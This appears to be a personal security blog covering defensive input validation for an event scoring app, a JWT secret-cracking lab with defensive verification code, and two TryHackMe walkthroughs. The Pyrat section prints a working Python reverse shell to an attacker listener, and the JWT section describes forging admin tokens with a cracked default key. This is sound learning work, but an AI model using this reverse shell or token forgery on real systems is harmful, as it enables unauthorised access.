Securing Sports

I built an application for keeping score at an IT disc golf event.

One of the more interesting aspects of building it in three weeks was applying secure development practices throughout the process.

I found my awareness and practical experience useful while:

  • Designing the architecture and flow of data
  • Identifying the risk profile in context of the event and application functions
  • Identifying potential attack chains
  • Implementing best practices for handling data and game state
  • Avoiding easy footholds for attackers on the frontend
The primary issue was avoiding defacement and data compromise via XSS and CSV command injection. Whitelisting on the frontend and backend proved sufficient to block any payloads that would affect the player scores or alter the leaderboard.
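As an added example (not the event application's own code), this is the kind of backend allow-listing and export sanitisation described above: player names and scores are validated against a strict pattern and range, values are HTML-escaped before they reach the leaderboard page, and the CSV export neutralises any cell that a spreadsheet would read as a formula. The name pattern, the stroke range and the column layout are assumptions.

```python
import csv
import html
import io
import re

# Allow-list for player names: a letter or digit, then letters, digits, spaces,
# apostrophes or hyphens, 2-40 characters in total (assumed policy). Nothing else is accepted.
NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9 '\-]{1,39}")
# Strokes per hole are bounded (assumed range); the leaderboard never stores free text scores.
MIN_STROKES, MAX_STROKES = 1, 15
# Leading characters that spreadsheet software interprets as the start of a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def validate_name(name: str) -> str:
    """Return the name unchanged if it matches the allow-list, otherwise raise ValueError."""
    if not NAME_RE.fullmatch(name):
        raise ValueError(f"rejected player name: {name!r}")
    return name


def validate_score(raw: str) -> int:
    """Accept only a plain integer stroke count inside the per-hole range."""
    if not raw.isdigit():
        raise ValueError(f"score is not a number: {raw!r}")
    strokes = int(raw)
    if not MIN_STROKES <= strokes <= MAX_STROKES:
        raise ValueError(f"score out of range: {strokes}")
    return strokes


def csv_safe_cell(value: str) -> str:
    """Defence in depth for the export: a cell that would start a formula gets a quote prefix."""
    if value.startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def html_safe(value: str) -> str:
    """Escape a value before it is rendered into the leaderboard HTML."""
    return html.escape(value, quote=True)


def export_leaderboard_csv(rows: list) -> str:
    """Serialise (player, per-hole strokes) rows as CSV with every text cell neutralised."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    writer.writerow(["player", "total"])
    for name, strokes in rows:
        writer.writerow([csv_safe_cell(name), sum(strokes)])
    return buf.getvalue()
```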

To mitigate DoS, I tested the limits of the backend with custom Python scripts. I also chose a hosting provider whose infrastructure has built-in protections, and added agents.md and robots.txt files.

Another consideration was access. I created a throwaway admin account that only I had the password to. 2FA was enabled, and only the admin account was allowed to reach the backend.

For player usage, I avoided building an auth system because of the way the event was structured (and the development timeline). Players were assigned a QR code tied to their scorecard.

In theory, players could submit phony scores. In practice, given the way QR codes were handled and the tools available to players, this was not a concern. An admin could correct scores from the admin panel if it happened.

JWT

I worked on a lab over the past two days that, among other vulnerabilities (SSRF, XSS), used default JWT secrets.

There are several attack vectors that exist with poor JWT implementations. I found the explanation linked below to be better than anything I could say myself.

Success came when I took a valid JWT after logging in, used hashcat to brute force the token's secret key against a wordlist of common JWT key defaults, and used this key in Burp Suite to sign a payload of my choice. This provided access to the admin panel of the website.

I wish I could say I did this first. Unfortunately, I tried sending requests without the JWT, manipulating the algorithm type, signing with my own key... it took a day to regroup and find the right exploit.
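An added example, not code from the lab or from any JWT library, of what the server side should have done so that both the weak-secret and the algorithm-swap attempts above fail: the HMAC secret is checked against a constructed, deliberately short list of known defaults and a minimum length before the app starts, and verification pins the algorithm to HS256 server-side instead of trusting the token header. The minimum length and the default list are assumptions.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed, deliberately short list of default secrets to refuse (assumption: a real
# deployment would load the same wordlists an attacker uses); minimum length is also assumed.
KNOWN_DEFAULT_SECRETS = {"secret", "password", "changeme", "jwt_secret", "default"}
MIN_SECRET_BYTES = 32


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def check_secret(secret: bytes) -> None:
    """Startup check: refuse a known default or a key shorter than the HMAC output size."""
    if len(secret) < MIN_SECRET_BYTES or secret.decode(errors="ignore") in KNOWN_DEFAULT_SECRETS:
        raise ValueError("JWT secret is a known default or too short")


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token; the header is fixed server-side, never derived from client input."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now=None) -> dict:
    """Verify with the algorithm pinned; the header's alg is checked against it, never obeyed."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # rejects "none" and any other algorithm swap
        raise ValueError(f"unexpected alg: {header.get('alg')!r}")
    expected = hmac.new(secret, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(body_b64))
    if "exp" in claims and (time.time() if now is None else now) >= claims["exp"]:
        raise ValueError("token expired")
    return claims
```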

SilverPlate - TryHackMe Box

So far, this lab has been my favorite: the application being used has tons of vulnerabilities, and it requires a lot of looking around to get what is needed.

An nmap scan reveals HTTP services on two different ports. The main website mentions the use of Silverpeas, some sort of admin/forum panel from the looks of things. The documentation describes what this endpoint looks like by default.

Some quick Googling reveals the application has several established vulnerabilities and default login credentials.

As you might imagine, getting into the user (and admin!) panel is a matter of following the documented login issue.

While walking the application, I made note of places where the URL parameters looked suspicious, entry points for XSS, and the admin's ability to create LDAP domains.

This LDAP functionality intrigued me, and unfortunately distracted me from the more obvious credentials available via broken access control. I'm not very experienced with LDAP, and wanted to see if I could create a domain and access it from my machine. This proved unsuccessful, as no LDAP port appeared open after further scanning.

Pyrat - TryHackMe Box

It took an hour to get the first step of this exploit. I had trouble building a functional socket in Python, so I tried netcat to reach the HTTP server. It worked!

A few interactions made it clear that the server was parsing input as Python. However, I wasn't getting any human readable output. I opted to send a reverse shell connecting to a netcat listener on my end. Fortunately, it worked (albeit with many typos and groaning along the way).

    # Payload sent to the Pyrat service, which evaluates whatever it receives as Python.
    # 10.10.24.249:4444 is the netcat listener on the author's machine.
    import os
    import socket
    import subprocess

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.24.249", 4444))
    # Point stdin, stdout and stderr at the socket, then hand the connection an interactive bash.
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/bash", "-i"])

I got stuck from here as to how to gain root access. I cannot read or move /etc/shadow, so cracking passwords is not an option for me. getcap has not yielded any useful information. I cannot write or modify files. I cannot use any cron services or existing processes. I was unable to find any older app versions after fuzzing for various phrases/extensions (.py, .conf, app, pyrat). I considered changing the sshd_config file, but did not see how that would prove useful.

So, I did the responsible thing and looked to see what other experienced people would do. I had not considered looking for Git commits, which turned out to be the source of functional credentials!